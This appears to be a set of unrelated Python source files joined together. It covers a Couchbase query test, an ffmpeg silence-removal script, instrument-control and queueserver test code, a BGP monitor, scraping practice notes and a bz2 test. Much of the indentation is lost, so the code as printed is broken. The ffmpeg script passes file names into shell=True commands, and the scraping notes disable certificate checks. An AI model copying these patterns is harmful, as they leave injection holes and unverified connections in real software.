0] + ' union select * from ' + self.query_buckets[0])
self.run_cbq_query('select * from ' + self.query_buckets[0] + ' union select * from ' + self.query_buckets[
0] + ' union select * from ' + self.query_buckets[0])
# Run a query that runs for a normal amount of time ~2 seconds
self.run_cbq_query('select * from ' + self.query_buckets[0] + ' limit 1000')
self.run_cbq_query('select * from ' + self.query_buckets[0] + ' limit 1000')
        # Only the queries that run for longer than 5 seconds should show up
result = self.run_cbq_query('select * from system:completed_requests')
self.assertEqual(result['metrics']['resultCount'], 2)
# Wipe the completed logs for the next test
self.run_cbq_query('delete from system:completed_requests')
# Check 1 millisecond, basically any query should show up here
min_duration = 1
response, content = self.rest.set_completed_requests_collection_duration(self.master, min_duration)
result = json.loads(content)
self.assertEqual(result['completed-threshold'], min_duration)
self.run_cbq_query('select * from system:active_requests')
self.run_cbq_query('select * from ' + self.query_buckets[0])
result = self.run_cbq_query('select * from system:completed_requests')
self.assertEqual(result['metrics']['resultCount'], 2)
# Disable logging
min_duration = -1
# Change the collection setting
response, content = self.rest.set_completed_requests_collection_duration(self.master, min_duration)
result = json.loads(content)
self.assertTrue(result['completed-threshold'] == min_duration)
self.run_cbq_query('delete from system:completed_requests')
self.run_cbq_query('select * from ' + self.query_buckets[0])
self.run_cbq_query('select * from ' + self.query_buckets[0])
# No queries should appear
result = self.run_cbq_query('select * from system:completed_requests')
self.assertEqual(result['metrics']['resultCount'], 0)
self.rest.set_completed_requests_collection_duration(self.master, 1000)
|
rm_silence_vid.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Feb 10 17:51:52 2019
@author: Mohammed Al-Rawi
Removes silence segments from videos.
The noise value can be used to control how much noise needs to be removed. A lower
'noise' dB value indicates lower noise (keeping in mind that -90 is lower than -30).
"""
import multiprocessing
import time
import argparse
import subprocess
import os
import re
import tqdm
parser = argparse.ArgumentParser()
parser.add_argument('--video_in', type=str, default='Pacino.mp4', help='Name of input video file')
parser.add_argument('--video_out', type=str, default='Pacino_no_silence.mp4',
                    help='Name of the output video file with the silence removed')
parser.add_argument('--silecne_file_out', type=str, default='tag_silence.txt',
                    help='Temporary text file that stores the detected silence intervals; it is not needed by the user and can be removed')
parser.add_argument('--noise', type=int, default=-30, help=
                    '-90 < noise < -10 (dB): a low value removes a lot of noise, higher values are somewhat more tolerant')
param = parser.parse_args()
''' This function generates the progress bar in parallel with the other function,
process_movie, which removes the silence. The function is simple: every 3 seconds it reads
the size of the generated (no-silence) video file and updates the progress bar, until the
size stops increasing, which marks the end of the silence removal. This function could be
improved in many ways; for example, analysing the size of the input file and the correlation
between input and output sizes would help estimate the size of the output (no-silence) file,
and a better progress bar would then be feasible. '''
def progress_bar(param):
size_in = 10*int( os.stat(param.video_in).st_size /1000000) # size of input file
size_out = 1; size_old = 0
time.sleep(3) # waiting for a while until silence tagging is done
pbar = tqdm.tqdm(total = 100) # the progress bar has 100 bins
while True:
if os.path.exists(param.video_out):
size_out = 10*int ( os.stat(param.video_out).st_size/1000000)
            if size_out == size_old: # when the size stops changing, silence removal is done
return
else:
size_old = size_out
else:
size_out=0
pbar.update(int(.25* (100*size_out)/size_in))
time.sleep(3)
'''This is the core function: it uses ffmpeg to detect the silence intervals and
then removes them, again with ffmpeg. We use a subprocess that calls ffmpeg
from the command line. '''
def process_movie(param):
if os.path.exists(param.video_out):
print('Removing old %s file' % param.video_out)
subprocess.call('rm -f '+ param.video_out, shell=True)
print('Detecting silence intervals, and then, removing the detected silence')
cmd_dtct_silence = 'ffmpeg -i '+ param.video_in + ' -af silencedetect=noise='+str(param.noise)+'dB:d=0.5 -f null - 2> ' + param.silecne_file_out
x1 = subprocess.call(cmd_dtct_silence, shell=True)
    if x1 != 0: print('Silence tagging was not successful')
start_time, end_time = get_times(param.silecne_file_out)
cmd_rmv_silence = time_to_cmd(start_time, end_time, param)
x2 = subprocess.call(cmd_rmv_silence, shell=True)
if x2!=0: print('Silence removal not successful')
'''This function converts an H:M:S time string into seconds. '''
def hms_time_to_sec(time_str):
h_m_s = time_str.split(':')
return float(h_m_s[0]) * 3600 + float(h_m_s[1]) * 60 + float(h_m_s[2])
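# A quick worked example of the conversion above (illustrative value, not from a real run):
# hms_time_to_sec('00:01:30.50') -> 0*3600 + 1*60 + 30.50 = 90.5 seconds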
'''This function reads the file generated by ffmpeg's silence detection.
The file is generated after running the command "cmd_dtct_silence"
shown in the process_movie() function. This function can be improved in many ways. '''
def get_times(fname):
text_file = open(fname, "r")
text_lines = text_file.readlines()
start_time =[]
end_time = []
movie_duration = 0 # forward assignment to prevent warnings
for line in text_lines:
if re.search(r'\b(Duration)\b', line) !=None:
token = line.split()
movie_duration = token[1] # read movie duration
if re.search(r'\b(silencedetect)\b', line) !=None:
token = line.split()
if token[3] == 'silence_start:':
start_time.append(abs(float(token[4]))) # for some reason, start time is -0.01
# start_time.append(float(token[4])) # for some reason, start time is -0.01
elif token[3] == 'silence_end:':
end_time.append(float(token[4]))
else:
continue
end_time.insert(0, 0) # For pos 0, insert time 0; see Timing Algorithm used in time_to_cmd()
movie_duration = hms_time_to_sec(movie_duration[:-1])
start_time.append(movie_duration)
    if len(end_time) < len(start_time): # the last silence may run to the end of the movie, leaving no silence_end entry
        end_time.append(movie_duration)
return start_time, end_time
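# For reference, get_times() above parses lines of the following shape from the
# silencedetect log (the numbers and the '0x...' address are illustrative; the exact
# formatting can vary between ffmpeg builds):
#   Duration: 00:01:00.00, start: 0.000000, bitrate: 1000 kb/s
#   [silencedetect @ 0x55d...] silence_start: 12.345
#   [silencedetect @ 0x55d...] silence_end: 15.678 | silence_duration: 3.333
# The 'Duration' line gives the movie length (token[1], trailing comma stripped), while
# the silence_start/silence_end tokens (token[3]/token[4]) fill start_time and end_time.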
'''This function converts the detected silence times, obtained via the
get_times() function, into a command that ffmpeg can use to remove the silence. '''
def time_to_cmd(start_time, end_time, param):
''' Timing Algorithm used:
t0(inserted to end_time)->tstrt1
tend1->tstrt2
.
.
tend_m -> t_movie_duration(appended to start_time)
'''
strt_end_string =''
for i in range(len(start_time)):
strt_end_string = strt_end_string + \
'between(t,' + str(end_time[i]) + ',' + str(start_time[i])+')' + '+'
strt_end_string = strt_end_string[:-1] # removing last plus
cmd_rmv_silence = 'ffmpeg -loglevel quiet -i '+ param.video_in + ' -vf '
cmd_rmv_silence = cmd_rmv_silence + '"select=' "'" + strt_end_string + "'"
cmd_rmv_silence = cmd_rmv_silence + ', setpts=N/FRAME_RATE/TB"'
cmd_rmv_silence = cmd_rmv_silence + ' -af '
cmd_rmv_silence = cmd_rmv_silence + '"aselect=' "'" + strt_end_string + "'"
cmd_rmv_silence = cmd_rmv_silence + ',asetpts=N/SR/TB" ' + param.video_out
return cmd_rmv_silence
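# Example of the command built above (illustrative numbers, not from a real run): with
# end_time = [0, 5.0] and start_time = [2.5, 60.0] (a 60 s movie), time_to_cmd() produces
# roughly:
#   ffmpeg -loglevel quiet -i Pacino.mp4 \
#       -vf "select='between(t,0,2.5)+between(t,5.0,60.0)', setpts=N/FRAME_RATE/TB" \
#       -af "aselect='between(t,0,2.5)+between(t,5.0,60.0)',asetpts=N/SR/TB" Pacino_no_silence.mp4
# i.e. only the non-silent intervals [end_time[i], start_time[i]] are kept, and their
# video/audio timestamps are regenerated so the output plays back continuously.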
# if __name__ == '__main__':
if not os.path.exists(param.video_in):
print('Cannot open file', param.video_in)
exit(0)
else:
'''Here, we have two parallel processes, p1 that processes the movie
and p2 that generates a progress bar. This is because I am using ffmpeg
from the terminal/shell to detect the silence, and then, to remove it.'''
p1 = multiprocessing.Process(target=process_movie, args = (param,))
p1.start()
p2 = multiprocessing.Process(target=progress_bar, args=(param,))
p2.start()
|
Example_MultithreadMultipleSessions.py
|
.. code-block:: python
"""
Multiple threads are accessing two RsInstrument objects with two separate sessions
"""
import threading
from RsInstrument import *
def execute(session: RsInstrument, session_ix, index) -> None:
"""Executed in a separate thread."""
print(f'{index} session {session_ix} query start...')
session.query_str('*IDN?')
print(f'{index} session {session_ix} query end')
# Make sure you have RsInstrument version 1.9.0 or newer
RsInstrument.assert_minimum_version('1.9.0')
instr1 = RsInstrument('TCPIP::192.168.56.101::INSTR')
instr2 = RsInstrument('TCPIP::192.168.56.101::INSTR')
instr1.visa_timeout = 200
instr2.visa_timeout = 200
# Synchronise the sessions by sharing the same lock
instr2.assign_lock(instr1.get_lock()) # To see the effect of crosstalk, comment this line
threads = []
for i in range(10):
t = threading.Thread(target=execute, args=(instr1, 1, i,))
t.start()
threads.append(t)
t = threading.Thread(target=execute, args=(instr2, 2, i,))
t.start()
threads.append(t)
print('All threads started')
# Wait for all threads to join this main thread
for t in threads:
t.join()
print('All threads ended')
instr2.close()
instr1.close()
|
test_start_manager.py
|
import threading
import time as ttime
import json
from bluesky_queueserver.manager.start_manager import WatchdogProcess
from bluesky_queueserver.tests.common import format_jsonrpc_msg
class ReManagerEmulation(threading.Thread):
"""
Emulation of RE Manager, which is using Thread instead of Process.
The functionality of the emulator is to test if Watchdog can start
and restart RE Manager properly. The emulator also generates periodic
    'heartbeat' messages to inform the Watchdog that RE Manager is running.
"""
def __init__(self, *args, conn_watchdog, conn_worker, config=None, log_level="DEBUG", **kwargs):
super().__init__(*args, **kwargs)
self._conn_watchdog = conn_watchdog
self.n_loops = 0
self._exit = False
self._restart = False
self._send_heartbeat = True
self._lock = threading.Lock()
self._config = config or {}
self._log_level = log_level
def _heartbeat(self):
hb_period, dt = 0.5, 0.01
n_wait = round(hb_period / dt)
msg = format_jsonrpc_msg("heartbeat", {"value": "alive"}, notification=True)
msg_json = json.dumps(msg)
while True:
# Since we are emulating 'kill' method, we want the function to
# react to 'exit' quickly.
for n in range(n_wait):
ttime.sleep(0.005)
if self._exit:
return
if self._send_heartbeat:
with self._lock:
self._conn_watchdog.send(msg_json)
def exit(self, *, restart=False):
"""
Stop the emulated RE Manager (exit the 'run' method). Set 'restart=True'
to skip informing Watchdog that the exit is intentional: Watchdog is expected
to restart the process.
"""
self._restart = restart
self._exit = True
def kill(self):
"""
This is emulation of 'kill' method of mp.Process. The method just normally
exists the current process.
"""
self.exit(restart=True)
def send_msg_to_watchdog(self, method, params=None, *, notification=False, timeout=0.5):
# The function may block all communication for the period of 'timeout', but
# this is acceptable for testing. Timeout would typically indicate an error.
msg = format_jsonrpc_msg(method, params, notification=notification)
with self._lock:
self._conn_watchdog.send(json.dumps(msg))
if notification:
return
if self._conn_watchdog.poll(timeout):
response_json = self._conn_watchdog.recv()
response = json.loads(response_json)
result = response["result"]
else:
result = None
return result
def stop_heartbeat(self):
"""
        Heartbeat generator may be stopped to emulate 'freezing' of the event loop of RE Manager.
"""
self._send_heartbeat = False
def run(self):
th_hb = threading.Thread(target=self._heartbeat)
th_hb.start()
while not self._exit:
ttime.sleep(0.01)
self.n_loops += 1
if not self._restart:
msg = format_jsonrpc_msg("manager_stopping", notification=True)
with self._lock:
self._conn_watchdog.send(json.dumps(msg))
th_hb.join()
class ReWorkerEmulation(threading.Thread):
def __init__(self, *args, conn, config=None, log_level="DEBUG", **kwargs):
super().__init__(*args, **kwargs)
self._config = config or {}
self._exit = False
self.n_loops = 0
self._log_level = log_level
def exit(self):
self._exit = True
def kill(self):
self.exit()
def run(self):
while not self._exit:
ttime.sleep(0.005)
self.n_loops += 1
def test_WatchdogProcess_1():
"""Test starting and orderly existing the RE Manager"""
wp = WatchdogProcess(cls_run_engine_manager=ReManagerEmulation)
wp_th = threading.Thread(target=wp.run)
wp_th.start()
ttime.sleep(1) # Let RE Manager run 1 second
assert wp._re_manager.n_loops > 0, "RE is not running"
wp._re_manager.exit(restart=False)
ttime.sleep(0.05)
assert wp._manager_is_stopping is True, "'Manager Stopping' flag is not set"
wp_th.join(0.1)
def test_WatchdogProcess_2():
"""Test starting RE Manager, stopping heartbeat generator
and waiting for restart of RE Manager"""
wp = WatchdogProcess(cls_run_engine_manager=ReManagerEmulation)
wp_th = threading.Thread(target=wp.run)
wp_th.start()
ttime.sleep(1) # Let RE Manager run 1 second
assert wp._re_manager.n_loops > 0, "RE is not running"
n_loops = wp._re_manager.n_loops
wp._re_manager.stop_heartbeat()
hb_timeout = wp._heartbeat_timeout
ttime.sleep(hb_timeout + 0.5)
# At this point RE Manager is expected to run for 0.5 second, so
# the new number of loops must be about 'n_loops/2'.
# Here we check if RE Manager was really restarted and the number of
# loops reset.
assert wp._re_manager.n_loops < n_loops, "Unexpected number of loops"
wp._re_manager.exit(restart=False)
ttime.sleep(0.05)
assert wp._manager_is_stopping is True, "'Manager Stopping' flag is not set"
wp_th.join(0.1)
def test_WatchdogProcess_3():
"""Test starting RE Manager, exiting without sending notification and
and waiting for the restart of RE Manager"""
wp = WatchdogProcess(cls_run_engine_manager=ReManagerEmulation)
wp_th = threading.Thread(target=wp.run)
wp_th.start()
ttime.sleep(1) # Let RE Manager run 1 second
assert wp._re_manager.n_loops > 0, "RE is not running"
n_loops = wp._re_manager.n_loops
# Stop RE Manager without notifying the Watchdog (emulates crashing of RE Manager)
wp._re_manager.exit(restart=True)
hb_timeout = wp._heartbeat_timeout
ttime.sleep(hb_timeout + 0.5)
# At this point RE Manager is expected to run for 0.5 second, so
# the new number of loops must be about 'n_loops/2'.
# Here we check if RE Manager was really restarted and the number of
# loops reset.
assert wp._re_manager.n_loops < n_loops, "Unexpected number of loops"
wp._re_manager.exit(restart=False)
ttime.sleep(0.05)
assert wp._manager_is_stopping is True, "'Manager Stopping' flag is not set"
wp_th.join(0.1)
def test_WatchdogProcess_4():
"""
Test if Watchdog correctly executing commands that control starting
and stopping RE Worker.
"""
wp = WatchdogProcess(cls_run_engine_manager=ReManagerEmulation, cls_run_engine_worker=ReWorkerEmulation)
wp_th = threading.Thread(target=wp.run)
wp_th.start()
ttime.sleep(0.01)
response = wp._re_manager.send_msg_to_watchdog("start_re_worker")
assert response["success"] is True, "Unexpected response from RE Manager"
# Worker is expected to be alive
response = wp._re_manager.send_msg_to_watchdog("is_worker_alive")
assert response["worker_alive"] is True, "Unexpected response from RE Manager"
# Join running process (thread). Expected to timeout.
    # Note: here the timeout should be set smaller than the timeout for the message
    # in the 'send_msg_to_watchdog' method.
response = wp._re_manager.send_msg_to_watchdog("join_re_worker", {"timeout": 0.1})
assert response["success"] is False, "Unexpected response from RE Manager"
# Worker is expected to be alive
response = wp._re_manager.send_msg_to_watchdog("is_worker_alive")
assert response["worker_alive"] is True, "Unexpected response from RE Manager"
# Exit the process (thread).
wp._re_worker.exit()
ttime.sleep(0.01)
# Worker is expected to be stopped
response = wp._re_manager.send_msg_to_watchdog("is_worker_alive")
assert response["worker_alive"] is False, "Unexpected response from RE Manager"
response = wp._re_manager.send_msg_to_watchdog("join_re_worker", {"timeout": 0.5})
assert response["success"] is True, "Unexpected response from RE Manager"
wp._re_manager.exit(restart=False)
wp_th.join(0.1)
def test_WatchdogProcess_5():
"""
Test 'kill_re_worker' command RE Worker.
"""
wp = WatchdogProcess(cls_run_engine_manager=ReManagerEmulation, cls_run_engine_worker=ReWorkerEmulation)
wp_th = threading.Thread(target=wp.run)
wp_th.start()
ttime.sleep(0.01)
response = wp._re_manager.send_msg_to_watchdog("start_re_worker")
assert response["success"] is True, "Unexpected response from RE Manager"
# Worker is expected to be alive
response = wp._re_manager.send_msg_to_watchdog("is_worker_alive")
assert response["worker_alive"] is True, "Unexpected response from RE Manager"
# Kill RE Worker process (emulated, since RE Worker is a thread)
response = wp._re_manager.send_msg_to_watchdog("kill_re_worker")
assert response["success"] is True, "Unexpected response from RE Manager"
# Worker is expected to be stopped
response = wp._re_manager.send_msg_to_watchdog("is_worker_alive")
assert response["worker_alive"] is False, "Unexpected response from RE Manager"
response = wp._re_manager.send_msg_to_watchdog("join_re_worker", {"timeout": 0.5})
assert response["success"] is True, "Unexpected response from RE Manager"
wp._re_manager.exit(restart=False)
wp_th.join(0.1)
def test_WatchdogProcess_6():
"""
Test if RE configuration is passed to RE Worker
"""
config_worker = {"some_parameter1": "some_value1"}
config_manager = {"some_parameter2": "some_value2"}
wp = WatchdogProcess(
config_worker=config_worker,
config_manager=config_manager,
cls_run_engine_manager=ReManagerEmulation,
cls_run_engine_worker=ReWorkerEmulation,
)
wp_th = threading.Thread(target=wp.run)
wp_th.start()
ttime.sleep(0.01)
response = wp._re_manager.send_msg_to_watchdog("start_re_worker")
assert response["success"] is True, "Unexpected response from RE Manager"
# Check if configuration was set correctly in RE Worker and RE manager
assert wp._re_worker._config == config_worker, "Worker configuration was not passed correctly"
assert wp._re_manager._config == config_manager, "Manager configuration was not passed correctly"
# Exit the process (thread).
wp._re_worker.exit()
ttime.sleep(0.01)
response = wp._re_manager.send_msg_to_watchdog("join_re_worker", {"timeout": 0.5})
assert response["success"] is True, "Unexpected response from RE Manager"
wp._re_manager.exit(restart=False)
wp_th.join(0.1)
|
monitor.py
|
# Copyright (C) 2016 Nippon Telegraph and Telephone Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from gobgp import GoBGP
import os
from settings import dckr
import yaml
import json
from threading import Thread
import time
import datetime
def rm_line():
print('\x1b[1A\x1b[2K\x1b[1D\x1b[1A')
class Monitor(GoBGP):
CONTAINER_NAME = 'bgperf_monitor'
def run(self, conf, dckr_net_name=''):
ctn = super(GoBGP, self).run(dckr_net_name)
config = {}
config['global'] = {
'config': {
'as': conf['monitor']['as'],
'router-id': conf['monitor']['router-id'],
},
}
config ['neighbors'] = [{'config': {'neighbor-address': conf['target']['local-address'],
'peer-as': conf['target']['as']},
'transport': {'config': {'local-address': conf['monitor']['local-address']}},
'timers': {'config': {'connect-retry': 10}}}]
with open('{0}/{1}'.format(self.host_dir, 'gobgpd.conf'), 'w') as f:
f.write(yaml.dump(config))
self.config_name = 'gobgpd.conf'
startup = '''#!/bin/bash
ulimit -n 65536
gobgpd -t yaml -f {1}/{2} -l {3} > {1}/gobgpd.log 2>&1
'''.format(conf['monitor']['local-address'], self.guest_dir, self.config_name, 'info')
filename = '{0}/start.sh'.format(self.host_dir)
with open(filename, 'w') as f:
f.write(startup)
os.chmod(filename, 0o777)
i = dckr.exec_create(container=self.name, cmd='{0}/start.sh'.format(self.guest_dir))
dckr.exec_start(i['Id'], detach=True, socket=True)
self.config = conf
return ctn
def local(self, cmd, stream=False):
i = dckr.exec_create(container=self.name, cmd=cmd)
return dckr.exec_start(i['Id'], stream=stream)
def wait_established(self, neighbor):
n = 0
while True:
if n > 0:
rm_line()
print(f"Waiting {n} seconds for monitor")
try:
neigh = json.loads(self.local('gobgp neighbor {0} -j'.format(neighbor)).decode('utf-8'))
except Exception as e:
print(f"Monitor reading exception: {e}")
continue
if ((neigh['state']['session_state'] == 'established') or
(neigh['state']['session_state'] == 6)):
return n
time.sleep(1)
n = n+1
def stats(self, queue):
self.stop_monitoring = False
def stats():
cps = self.config['monitor']['check-points'] if 'check-points' in self.config['monitor'] else []
while True:
if self.stop_monitoring:
return
try:
info = json.loads(self.local('gobgp neighbor -j').decode('utf-8'))[0]
except Exception as e:
print(f"Monitor reading exception: {e}")
continue
info['who'] = self.name
state = info['afi_safis'][0]['state']
if 'accepted'in state and len(cps) > 0 and int(cps[0]) <= int(state['accepted']):
cps.pop(0)
info['checked'] = True
else:
info['checked'] = False
info['time'] = datetime.datetime.now()
queue.put(info)
time.sleep(1)
t = Thread(target=stats)
t.daemon = True
t.start()
|
Day-Test.py
|
# Daily practice snippets; updated as they are used
import json
import re
import threading
import time
from queue import Queue
import requests
from bs4 import BeautifulSoup
from lxml import etree
from retrying import retry
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
"(KHTML, like Gecko) Chrome/64.0.3282.204 Safari/537.36"
}
# 1. Convert a cookiejar to a dict, and a dict back to a cookiejar
def trans_test():
response = requests.get('http://www.xingtu.info/')
cookies = requests.utils.dict_from_cookiejar(response.cookies) # cookie -> dict
print('cookie_dict:', cookies)
cookies = requests.utils.cookiejar_from_dict(cookies) # dict -> cookie
print('cookie_object', cookies)
# trans_test()
# 2. Using a proxy (proxies specifies the proxies; several entries may be given)
def proxie_test():
proxies = {
"http": '218.14.115.211:3128'
}
requests.get('http://www.xingtu.info/', headers=headers, proxies=proxies)
# proxie_test()
# 3. Handling certificate errors (use the verify parameter to skip certificate verification)
def ssl_test():
response = requests.get('https://www.12306.cn/mormhweb/', headers=headers, verify=False)
with open('./1.html', 'wb') as file:
file.write(response.content)
# ssl_test()
# 4. Timeout handling (a timeout raises an error), with retries (retrying)
@retry(stop_max_attempt_number=3)
def retry_test():
proxies = {
"https": '120.33.247.207:8010'
}
response = requests.get('https://www.baidu.com', headers=headers, proxies=proxies, timeout=3)
print(response.content)
# retry_test()
# 5. dump, dumps, load, loads
def json_test():
    data = json.dumps([{"a": "1"}, '3']) # dumps: Python object -> JSON string
    print(json.loads(data)) # loads: JSON string -> Python object
    file = open('./test.dat', 'w') # dump: write JSON to a file
json.dump(data, file)
file.close()
    file = open('./test.dat', 'r') # load: read JSON from a file
content = json.load(file)
file.close()
print(content)
# json_test()
# 6. zip() takes iterables as arguments, packs the elements with the same index from each into tuples, and returns those tuples (a list in Python 2, an iterator in Python 3).
def zip_test():
a = [1, 2, 3]
b = [4, 5, 6]
c = [4, 5, 6, 7, 8]
    zipped = zip(a, b) # pack the two lists together
print(zipped)
    print(zip(a, c)) # the number of packed elements matches the shortest iterable
    print(zip(*zipped)) # *zipped can be read as "unzip", recovering the original rows
# zip_test()
# 7. re (using compile; re.S makes '.' match newlines, re.I ignores case)
def re_test():
string = '123qwe\n123QWE'
    reg = re.compile(r'.*', re.S) # re.S - make '.' match newlines as well
print(reg.search(string))
    reg = re.compile(r'.*qwe.*qwe', re.S | re.I) # re.I - ignore case
print(reg.search(string))
# re_test()
# 8.xpath
def xpath_test():
with open('./test.html', 'r') as file:
e = etree.HTML(file.read())
print(e.xpath('//p'))
# xpath_test()
# 9. bs4 (see any CSS selector reference for the selection rules)
def bs4_test():
with open('./test.html', 'r') as file:
html = file.read()
soup = BeautifulSoup(html, 'lxml')
    # Tag selectors (.string returns the text or comment as a bs4 object; get_text() returns a plain str)
print(soup.a.string) # 获取注释或内容,type:bs4对象
print(soup.a.get_text()) # 获取内容,type:str
print(soup.find('a'))
print(soup.find('a', attrs={'id': 'link2'}))
print(soup.find_all('a', attrs={'id': 'link2', 'class': 'sister'}))
print(soup.find_all('a'))
print(soup.find_all('a', attrs={'class': 'sister'}))
    # Class selectors ('.a.b': both classes, '.a .b': descendant, '.a > .b': direct child, '.a , .b': either)
print(soup.select('.sister'))
print(soup.select('.sister.haha')) # 多个类名
print(soup.select('.sister .haha')) # 子孙
print(soup.select('.sister > .haha')) # 儿子
print(soup.select('.sister , .haha')) # 或
    # ID selector
print(soup.select('#link2'))
    # Attribute selector
print(soup.select('a[id="link2"]'))
    # Hierarchy selectors ('p a': descendant, 'p > a': direct child, 'p , a': either)
print(soup.select('p a')) # 子孙
print(soup.select('p > a')) # 儿子
print(soup.select('p , a')) # 或
# bs4_test()
# 10. Daemon threads and daemon processes (True: they end together with the main process; False: the child thread/process keeps running after the main process ends)
def daemon_test():
def run():
while True:
print('1')
time.sleep(1)
th = threading.Thread(target=run)
th.setDaemon(True)
th.start()
# daemon_test()
# 11. Using a queue
def queue_test():
queue = Queue(maxsize=10)
    print('-----------program start------------')
    print('qsize:', queue.qsize())
    print('unfinished_tasks:', queue.unfinished_tasks) # unfinished_tasks is an internal Queue attribute - the number of unfinished tasks in the queue
print('-----------put------------')
queue.put('1')
print('qsize:', queue.qsize())
print('unfinished_tasks:', queue.unfinished_tasks)
print('-----------get------------')
queue.get()
print('qsize:', queue.qsize())
print('unfinished_tasks:', queue.unfinished_tasks)
print('-----------task_done------------')
queue.task_done() # unfinished_tasks - 1
print('qsize:', queue.qsize())
print('unfinished_tasks:', queue.unfinished_tasks)
print('-----------join------------')
    queue.join() # watches unfinished_tasks and blocks while it is not zero
# queue_test()
# Douyu homepage live-room data (selenium)
# Weibo login (selenium; there is a captcha)
# scrapy
# pip install scrapy
# Create a scrapy project: cd to your workspace -> scrapy startproject <project-name> -> e.g. scrapy startproject myspider
# Generate a spider: cd into the scrapy project -> scrapy genspider <spider-name> "<top-level domain>" -> e.g. scrapy genspider tencent 'tencent.com'
# Notes:
# response.xpath() returns a list-like object containing Selector objects; it behaves like a list but adds a few extra methods
# extract() returns a list of strings
# extract_first() returns the first string in the list, or None if the list is empty
# the spider must define a parse method
# the URLs to crawl must belong to allowed_domains, but the URLs in start_urls are not subject to this restriction
# mind where you start the crawler: it must be started from inside the project directory
# Why use yield?
# It turns the whole function into a generator. What is the benefit?
# When iterating over the function's results, items are read into memory one at a time, so memory usage does not spike
# (the same idea as range in Python 3 versus xrange in Python 2)
# Notes:
# yield may only emit BaseItem, Request, dict or None
# Several pipelines can be enabled in settings. Why enable more than one?
# Different pipelines can handle data from different spiders
# Different pipelines can perform different processing steps, e.g. one cleans the data and another saves it
# Pipeline usage notes:
# a pipeline must be enabled in settings before it is used
# in the ITEM_PIPELINES setting the key is the pipeline's path (its location in the project can be customised) and the value is its distance from the engine: the closer it is, the earlier it receives the data
# with several pipelines enabled, process_item must return item, otherwise the next pipeline receives None
# a pipeline must implement process_item, otherwise items cannot be received and processed
# process_item receives item and spider, where spider is the spider that passed the item in
# to make the output we care about easier to spot in the terminal, set the log level in the settings
# add one line to the settings (all caps): LOG_LEVEL = "WARNING"
# by default the terminal shows debug-level log messages
# Tencent recruitment site (scrapy); a minimal sketch of the spider/pipeline pattern follows below
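# A minimal, hypothetical sketch of the spider + pipeline pattern described in the notes
# above. The class names, URL and item fields are illustrative only (they are not taken
# from a real project), and the import is guarded so that this practice file still runs
# on machines without scrapy installed.
try:
    import scrapy

    class TencentSpider(scrapy.Spider):
        name = 'tencent'
        allowed_domains = ['tencent.com']
        start_urls = ['https://careers.tencent.com/']

        def parse(self, response):
            # response.xpath() returns a SelectorList; extract() gives a list of strings
            for title in response.xpath('//a/text()').extract():
                # yield may emit an Item, a Request, a dict or None
                yield {'title': title}

    class PrintPipeline:
        def process_item(self, item, spider):
            # process_item must return the item, otherwise the next enabled
            # pipeline in ITEM_PIPELINES receives None
            print(spider.name, item)
            return item
except ImportError:
    pass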
|
test_bz2.py
|
from test import support
from test.support import bigmemtest, _4G
import unittest
from io import BytesIO, DEFAULT_BUFFER_SIZE
import os
import pickle
import glob
import tempfile
import pathlib
import random
import shutil
import subprocess
import threading
from test.support import import_helper
from test.support import threading_helper
from test.support.os_helper import unlink
import _compression
import sys
# Skip tests if the bz2 module doesn't exist.
bz2 = import_helper.import_module('bz2')
from bz2 import BZ2File, BZ2Compressor, BZ2Decompressor
has_cmdline_bunzip2 = None
def ext_decompress(data):
global has_cmdline_bunzip2
if has_cmdline_bunzip2 is None:
has_cmdline_bunzip2 = bool(shutil.which('bunzip2'))
if has_cmdline_bunzip2:
return subprocess.check_output(['bunzip2'], input=data)
else:
return bz2.decompress(data)
class BaseTest(unittest.TestCase):
"Base for other testcases."
TEXT_LINES = [
b'root:x:0:0:root:/root:/bin/bash\n',
b'bin:x:1:1:bin:/bin:\n',
b'daemon:x:2:2:daemon:/sbin:\n',
b'adm:x:3:4:adm:/var/adm:\n',
b'lp:x:4:7:lp:/var/spool/lpd:\n',
b'sync:x:5:0:sync:/sbin:/bin/sync\n',
b'shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\n',
b'halt:x:7:0:halt:/sbin:/sbin/halt\n',
b'mail:x:8:12:mail:/var/spool/mail:\n',
b'news:x:9:13:news:/var/spool/news:\n',
b'uucp:x:10:14:uucp:/var/spool/uucp:\n',
b'operator:x:11:0:operator:/root:\n',
b'games:x:12:100:games:/usr/games:\n',
b'gopher:x:13:30:gopher:/usr/lib/gopher-data:\n',
b'ftp:x:14:50:FTP User:/var/ftp:/bin/bash\n',
b'nobody:x:65534:65534:Nobody:/home:\n',
b'postfix:x:100:101:postfix:/var/spool/postfix:\n',
b'niemeyer:x:500:500::/home/niemeyer:/bin/bash\n',
b'postgres:x:101:102:PostgreSQL Server:/var/lib/pgsql:/bin/bash\n',
b'mysql:x:102:103:MySQL server:/var/lib/mysql:/bin/bash\n',
b'www:x:103:104::/var/www:/bin/false\n',
]
TEXT = b''.join(TEXT_LINES)
